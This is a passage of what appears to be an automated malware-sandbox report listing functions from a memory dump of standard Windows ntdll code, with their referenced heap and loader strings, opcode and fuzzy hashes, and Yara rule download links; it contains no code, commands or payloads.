                                                                                                                                                                                            • Instruction Fuzzy Hash: F2F160F9A003288BDB21DF18CC80B99B3B5EF44B54F5440D9E94DABA41E731AE85CF59
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • HEAP: , xrefs: 33CF14B6
                                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 33CF1632
                                                                                                                                                                                            • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 33CF1648
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                                                                                                                            • API String ID: 0-3178619729
                                                                                                                                                                                            • Opcode ID: 6634dc4a8d54c6015996ddbc723321acbabc6644657ee1a1eb49fd767783d1c6
                                                                                                                                                                                            • Instruction ID: 96ae6d3c67e03af6fb276e30f0f59931ba3f69dc1ab72f1849257327d69b0b1d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6634dc4a8d54c6015996ddbc723321acbabc6644657ee1a1eb49fd767783d1c6
                                                                                                                                                                                            • Instruction Fuzzy Hash: A8E1EE74A047459FE759CF29C480BBABBF5EF88310F188959E4D6CB245EB36E940CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D1F4D0 Relevance: 4.1, Strings: 3, Instructions: 382COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • RTL: Re-Waiting, xrefs: 33D60128
                                                                                                                                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 33D600F1
                                                                                                                                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 33D600C7
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                                                                                                            • API String ID: 0-2474120054
                                                                                                                                                                                            • Opcode ID: 8967f8d28bffcf2c76cf227652e3318a9a1867c1a9bb3c12c5c31497ad9f7c78
                                                                                                                                                                                            • Instruction ID: a059da3b11d04ae638c677be2ca1d0c85001c298aba1ea5166f11c3bc1908d3e
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8967f8d28bffcf2c76cf227652e3318a9a1867c1a9bb3c12c5c31497ad9f7c78
                                                                                                                                                                                            • Instruction Fuzzy Hash: 43E1EF75A08741DFE310CF28D880B0AB7E8BB84768F540B19F5A4CB6E2DB78D854CB52
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFB9C0 Relevance: 4.1, Strings: 3, Instructions: 361COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • 'LDR: %s(), invalid image format of MUI file , xrefs: 33D538BB
                                                                                                                                                                                            • {, xrefs: 33D538C4
                                                                                                                                                                                            • LdrpLoadResourceFromAlternativeModule, xrefs: 33D538B6
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 'LDR: %s(), invalid image format of MUI file $LdrpLoadResourceFromAlternativeModule${
                                                                                                                                                                                            • API String ID: 0-1697150599
                                                                                                                                                                                            • Opcode ID: ce52c1aa6d43e7169a2ae5d152cb1666a1b9e12722938a3f000fb2b01afdc755
                                                                                                                                                                                            • Instruction ID: 29a089a7abc782b71facd208795729ad6522867a3c292bd50527bdae0ace8c53
                                                                                                                                                                                            • Opcode Fuzzy Hash: ce52c1aa6d43e7169a2ae5d152cb1666a1b9e12722938a3f000fb2b01afdc755
                                                                                                                                                                                            • Instruction Fuzzy Hash: 81E1A8746083858BE784CF14C580B5BBBE5BF88784F498A2DF885CB264DB76D945CB82
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFB5E0 Relevance: 4.1, Strings: 3, Instructions: 303COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit$MUI
                                                                                                                                                                                            • API String ID: 0-1145731471
                                                                                                                                                                                            • Opcode ID: ccece63ccf3a68f5246f2b9f0a523563d8b182374528928a0647627ae50b5881
                                                                                                                                                                                            • Instruction ID: d0bc8f129143f40a17b8e8b31d63affb9210e286190e5423ea3962bffa98059f
                                                                                                                                                                                            • Opcode Fuzzy Hash: ccece63ccf3a68f5246f2b9f0a523563d8b182374528928a0647627ae50b5881
                                                                                                                                                                                            • Instruction Fuzzy Hash: 34B18775A02745CBEF58CF69C890B9DB7B6AF84794F28842DE851EBB90D731E840CB10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$DelegatedNtdll$\SystemRoot\system32\
                                                                                                                                                                                            • API String ID: 0-2391371766
                                                                                                                                                                                            • Opcode ID: 1e9f3d07e7a5211ba464b915db8eeeafff728727104319f48511303713bba03a
                                                                                                                                                                                            • Instruction ID: d11ec024f637498616125339e71360c22fc7cc11a30438da87f630de0f789020
                                                                                                                                                                                            • Opcode Fuzzy Hash: 1e9f3d07e7a5211ba464b915db8eeeafff728727104319f48511303713bba03a
                                                                                                                                                                                            • Instruction Fuzzy Hash: FEB1A0B2A15341AFE321DF54C880B5BB7E8EF45754F440929FA90DBA80D774E848CBE2
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D8327E Relevance: 4.0, Strings: 3, Instructions: 236COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: @$LdrpResMapFile Enter$LdrpResMapFile Exit
                                                                                                                                                                                            • API String ID: 0-318774311
                                                                                                                                                                                            • Opcode ID: a0d9824d21c137d7e870cc3b7278c3acd243841a9072f727fe5fc07c807d6b66
                                                                                                                                                                                            • Instruction ID: a28df23a13b998b36a216a2776ec85402b642e74f1dd36444bded8566c620169
                                                                                                                                                                                            • Opcode Fuzzy Hash: a0d9824d21c137d7e870cc3b7278c3acd243841a9072f727fe5fc07c807d6b66
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7D816079A09340AFE711CB25C840B5AB7E8FF85B50F480959F988DBA90DB74E904CB62
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D77090 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Objects=%4u$Objects>%4u$VirtualAlloc
                                                                                                                                                                                            • API String ID: 0-3870751728
                                                                                                                                                                                            • Opcode ID: a6460d20fb3d3edab757f2923fecc03c7f5139fe5d6daccbb20f9dabebba84a2
                                                                                                                                                                                            • Instruction ID: 55748c97ae651f523fba8efc75c2b5397fd082988be952c3f381217bdc2f71af
                                                                                                                                                                                            • Opcode Fuzzy Hash: a6460d20fb3d3edab757f2923fecc03c7f5139fe5d6daccbb20f9dabebba84a2
                                                                                                                                                                                            • Instruction Fuzzy Hash: B6914AB0E003059FEB54CFA8C880BADBBB1BF48314F14856AE954AB391E7759941CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CFB360 Relevance: 4.0, Strings: 3, Instructions: 221COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrpResGetResourceDirectory Enter$LdrpResGetResourceDirectory Exit${
                                                                                                                                                                                            • API String ID: 0-373624363
                                                                                                                                                                                            • Opcode ID: 4d9502d606b32768e63b89cdfedadb87980ca20113017fde2f45765f8cae1250
                                                                                                                                                                                            • Instruction ID: ccc1684b3db8208f52dbba65caad3202c1608d98ad351978b38028d44d8a49a2
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4d9502d606b32768e63b89cdfedadb87980ca20113017fde2f45765f8cae1250
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3391EEB5A05749CBEB12CF55C4407AEB7B0FF00764F288199E851EB790D77ADA80CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33DCB2BC Relevance: 3.9, Strings: 3, Instructions: 180COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • TargetNtPath, xrefs: 33DCB3AF
                                                                                                                                                                                            • GlobalizationUserSettings, xrefs: 33DCB3B4
                                                                                                                                                                                            • \Registry\Machine\SYSTEM\CurrentControlSet\Control\International, xrefs: 33DCB3AA
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                                                                                                                                                                            • API String ID: 0-505981995
                                                                                                                                                                                            • Opcode ID: 775d64cc0b7cd7268c20fe982bd14281a17bf7d5af8bb8a70e6a146f68abc088
                                                                                                                                                                                            • Instruction ID: 7e3a27ac4dbf6802649af9a818d64f6e0e95d67b0492bd68aa8c8c69ed15cd7a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 775d64cc0b7cd7268c20fe982bd14281a17bf7d5af8bb8a70e6a146f68abc088
                                                                                                                                                                                            • Instruction Fuzzy Hash: 06618C72D91268AFDB21DB54DC88BDAB7B8EB14710F4101E5E908AB251CB74DE85CFA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CEF75B Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 33D4E455
                                                                                                                                                                                            • HEAP: , xrefs: 33D4E442
                                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 33D4E435
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                                                                                                                            • API String ID: 0-1340214556
                                                                                                                                                                                            • Opcode ID: c8c86cc65747c21c9129690d293725587468b80df319aef209efb7c304ac138c
                                                                                                                                                                                            • Instruction ID: 49908eb75a4bc589b3a9c2df2e5348f5bc5603a65c7ccc7f8dfd1dd6c4de9cc1
                                                                                                                                                                                            • Opcode Fuzzy Hash: c8c86cc65747c21c9129690d293725587468b80df319aef209efb7c304ac138c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1B512A36A04784EFE312CBA8C844F5ABBF8FF05745F0541A5E590CBA52DB74E910CB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D11514 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • minkernel\ntdll\ldrmap.c, xrefs: 33D5A3A7
                                                                                                                                                                                            • LdrpCompleteMapModule, xrefs: 33D5A39D
                                                                                                                                                                                            • Could not validate the crypto signature for DLL %wZ, xrefs: 33D5A396
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                                                                                                                            • API String ID: 0-1676968949
                                                                                                                                                                                            • Opcode ID: f48e2273da873df3c413db8d1abbef1be2025071789714cc38b68e4584040c2e
                                                                                                                                                                                            • Instruction ID: 3741bbf0b6aae041de676c1aed6496732f3373f98d42f5f020a6a20bf3f82d33
                                                                                                                                                                                            • Opcode Fuzzy Hash: f48e2273da873df3c413db8d1abbef1be2025071789714cc38b68e4584040c2e
                                                                                                                                                                                            • Instruction Fuzzy Hash: AE511174E047419BFB12CFA8D944B1A7BF4AF00B54F5806A4F9929BBD6DB74E900CB40
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D9D62C Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • HEAP: , xrefs: 33D9D79F
                                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 33D9D792
                                                                                                                                                                                            • Heap block at %p modified at %p past requested size of %Ix, xrefs: 33D9D7B2
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                                                                                                                            • API String ID: 0-3815128232
                                                                                                                                                                                            • Opcode ID: 38b3c928b8e9d320311b5e636c8d97345e984d17652cff841e1281c4880c3dda
                                                                                                                                                                                            • Instruction ID: af63f156e303a567772869a42d42676be5061fb2797ce8ed22e433fba49ab33c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 38b3c928b8e9d320311b5e636c8d97345e984d17652cff841e1281c4880c3dda
                                                                                                                                                                                            • Instruction Fuzzy Hash: D65114791007548EF350EE29CC407F2B7E1DF45684F95488AE4D6CB68DDA36E847DB60
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CF1A24 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 33D4F96A
                                                                                                                                                                                            • HEAP: , xrefs: 33D4F95F
                                                                                                                                                                                            • HEAP[%wZ]: , xrefs: 33D4F952
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                                                                                                                                                                            • API String ID: 0-1596344177
                                                                                                                                                                                            • Opcode ID: 356de88e447b7bcd8379ad658cc3a1ba5e6f9e57267456373fcd2dc3be574d0d
                                                                                                                                                                                            • Instruction ID: 417171e9ee32a6f535abcd7f6d8cc410fb0579335e3bdf23da79a129018f978b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 356de88e447b7bcd8379ad658cc3a1ba5e6f9e57267456373fcd2dc3be574d0d
                                                                                                                                                                                            • Instruction Fuzzy Hash: E251CE75A00215EFEB44CF68C580A69BBF5FF44310F198298D458DF242DB72ED42CB90
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33CE753F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                                                                                                                                                                            • API String ID: 0-1151232445
                                                                                                                                                                                            • Opcode ID: 47a9b97dc0d1edc02ba8e442ad846b768ac15e71f7699ebea3bb8b2dc657b99c
                                                                                                                                                                                            • Instruction ID: 0895041d4fdbb89326ab36ec53587edee3d60044514fb698fc0520f9dad06f6b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 47a9b97dc0d1edc02ba8e442ad846b768ac15e71f7699ebea3bb8b2dc657b99c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 494145786013808FEB15CF1DC481BA577E89F0174AF6844A9E485CFA56DF74E486CB21
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D215EF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 33D61943
                                                                                                                                                                                            • minkernel\ntdll\ldrtls.c, xrefs: 33D61954
                                                                                                                                                                                            • LdrpAllocateTls, xrefs: 33D6194A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                                                                                                                                                                            • API String ID: 0-4274184382
                                                                                                                                                                                            • Opcode ID: a4c507b465ce7b2692405fcc37dd6da1a1e9c56eb1f8532cb40d602bef366fc8
                                                                                                                                                                                            • Instruction ID: 3cdfcba81db8423d6bbaa1bd823b7e6a105691f87ae76b26aecce2f1e9c3115d
                                                                                                                                                                                            • Opcode Fuzzy Hash: a4c507b465ce7b2692405fcc37dd6da1a1e9c56eb1f8532cb40d602bef366fc8
                                                                                                                                                                                            • Instruction Fuzzy Hash: 764145B6E00705EFDB15DFA8C841AAEBBF5FF48704F44812AE455A7A51DB35E801CBA0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D232C0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • Actx , xrefs: 33D232CC
                                                                                                                                                                                            • SXS: %s() passed the empty activation context data, xrefs: 33D62808
                                                                                                                                                                                            • RtlCreateActivationContext, xrefs: 33D62803
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.3795336805.0000000033CC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 33CC0000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.3795336805.0000000033DED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_33cc0000_fjerbregners_patrol.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                                                                                                                                                                            • API String ID: 0-859632880
                                                                                                                                                                                            • Opcode ID: dc012842bee1864803b8b823e18e31765d10373e5d0188c0cba6eba5b22ecd44
                                                                                                                                                                                            • Instruction ID: ba596fce5b1d493ca1750980a766be4bc3e1f3dfa0e181ab98e6f905ab47f92a
                                                                                                                                                                                            • Opcode Fuzzy Hash: dc012842bee1864803b8b823e18e31765d10373e5d0188c0cba6eba5b22ecd44
                                                                                                                                                                                            • Instruction Fuzzy Hash: 14312472A003059FEB02CE18D880F9A7BA5EF44B18F544469EC14DF646CB74D906CBE0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 33D7B214 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • GlobalFlag, xrefs: 33D7B30F
                                                                                                                                                                                            • @, xrefs: 33D7B2F0
                                                                                                                                                                                            • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 33D7B2B2
                                                                                                                                                                                            Memory Dump Source
